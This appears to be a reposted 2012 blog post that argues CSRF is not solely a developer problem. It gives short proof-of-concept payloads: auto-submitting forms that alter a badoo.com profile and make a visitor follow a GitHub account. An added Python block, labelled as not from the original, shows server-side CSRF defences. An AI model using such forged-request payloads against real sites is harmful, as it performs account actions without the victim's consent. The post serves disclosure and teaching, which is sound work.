Thursday, April 05, 2012

A few CSRF-like vulnerable examples.

Remark: Post is published on April 2 (but was expected yesterday) coz Berlin haz no free wifi cause I'm not joking and I figured out that Sunday is the worst day for urgent updates. Well, who cares the date, enjoy:

TL;DR:
I'm trying hard to prove my point that the statement "CSRF is only the developers' problem" is not true. I provided some examples and I want you to check them out. I really appreciate any viewpoint on this problem. Thank you for your attention in advance!

Quick overview:

showcase: 
document.write('<form action="http://badoo.com/ws/anketa-ws.phtml?ws=1" method=post> <input name="name" value="SUUUUP"><input name="fname" value="SUUUUP"><input name="sname" value="SUUUUP"><input name="birth_day" value="28"><input name="birth_month" value="01"><input name="section" value="basic"><input name="birth_year" value="1991"> </form>')

description: 
e.g. changing your profile details. No protection at all.

showcase: 
<script>
document.write('<form target=ifr name=pwn method=post action="https://github.com/users/follow?target=homakov"></form>')
pwn.submit()
</script>

description: 
Makes you follow a certain account without your confirmation. Reported a few weeks ago and fixed.

showcase: 
description: 
Deleting a presentation via GET. Commenting without confirmation. Following via GET, etc.
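
A server-side check that would reject the three kinds of request described above (a POST form with no protection, an auto-submitted cross-site POST, and a state change via GET). This is an added example, not code from the original post or from any of the sites mentioned; the routes, the origin, the session id and the HMAC-based token scheme are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

SECRET = secrets.token_bytes(32)      # per-deployment key (constructed here)
SITE_ORIGIN = "https://app.example"   # hypothetical origin of the protected site
# Hypothetical routes that change state, mirroring the actions listed above.
STATE_CHANGING = {"/profile/update", "/users/follow", "/presentations/delete"}


def issue_token(session_id: str) -> str:
    """Token the server embeds in its own forms; bound to the user's session."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def check_request(method, path, headers, session_id, form):
    """Return (status, reason) for a request that carries a valid session cookie."""
    if path not in STATE_CHANGING:
        return 200, "read-only route"
    # State changes must never be reachable by GET: a link or <img> can fire one.
    if method != "POST":
        return 405, "state change requires POST"
    # Modern browsers send Origin on cross-site POSTs; reject a foreign one.
    origin = headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403, "cross-site origin"
    # A form on another site cannot read the user's token, so cannot supply it.
    sent = form.get("csrf_token", "")
    if not hmac.compare_digest(sent.encode(), issue_token(session_id).encode()):
        return 403, "missing or bad CSRF token"
    return 200, "ok"


def demo():
    sid = "session-abc123"  # constructed session id
    forged_post = check_request("POST", "/users/follow",
                                {"Origin": "https://other.example"}, sid,
                                {"target": "someone"})
    forged_no_origin = check_request("POST", "/profile/update", {}, sid,
                                     {"name": "SUUUUP"})
    get_delete = check_request("GET", "/presentations/delete", {}, sid, {})
    legit = check_request("POST", "/profile/update", {"Origin": SITE_ORIGIN}, sid,
                          {"name": "Alice", "csrf_token": issue_token(sid)})
    return forged_post, forged_no_origin, get_delete, legit


if __name__ == "__main__":
    for result in demo():
        print(result)
```
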

Read more: Egor Homakov

Posted via email from Jasper-Net